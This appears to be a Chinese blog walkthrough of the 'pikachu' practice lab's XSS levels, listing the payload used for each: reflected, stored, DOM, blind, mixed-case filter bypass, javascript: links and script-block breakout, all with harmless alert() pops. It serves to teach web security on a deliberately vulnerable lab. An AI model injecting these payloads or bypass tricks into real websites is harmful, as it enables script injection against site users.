pikachu-XSS闯关挑战

get

message=<script>alert("123")</script>&submit=submit

post

可以暴力破解账号密码,但由于是XSS练习,点右上角的提示,就可以登陆

直接在输入框中输入

<script>alert("123")</script>

存储型

<script>alert("123")</script>

DOM

随意输入可以看到提示

进入源码找到提示,将标签闭合

' onclick="alert('123')"

xss-x

同样的语句,链接点两次

盲打

在留言板输入,发现没有变化,在提示中看到登陆后台

<script>alert("456")</script>

在后台可以看到弹窗

过滤

输入发现被过滤

大小写混合,成功

<SCriPt>alert("123")</sCrIPt>

html

可以看到源码时链接

输入

javascript:alert(/xss/)

href

输入上一个,点击链接即可

js输出

看到源码是一个script语句,将前面的闭合,再写一个新的弹窗

</script><script>alert("123")</script>
相关推荐
fan_00022 分钟前
LKT4304新一代算法移植加密芯片,守护 物联网设备和云服务安全
物联网·安全
AI创世纪28 分钟前
WIN11 UEFI漏洞被发现, 可以绕过安全启动机制
网络·安全
xiaocao_102330 分钟前
手机备忘录:安全存储与管理个人笔记的理想选择
笔记·安全·智能手机
Joeysoda2 小时前
Java数据结构 (从0构建链表(LinkedList))
java·linux·开发语言·数据结构·windows·链表·1024程序员节
Bruce_Liuxiaowei3 小时前
AI时代的网络安全:传统技术的落寞与新机遇
人工智能·安全·web安全
小马爱打代码3 小时前
TCP 详解
网络·网络协议·tcp/ip
努力的小T4 小时前
基于 Bash 脚本的系统信息定时收集方案
linux·运维·服务器·网络·云计算·bash
TS_forever0074 小时前
【华为路由的arp配置】
网络·华为
Aurora Dream极光之梦4 小时前
CSRF漏洞学习总结
学习·安全·csrf
Andya_net5 小时前
网络安全 | 0day漏洞介绍
网络·安全·web安全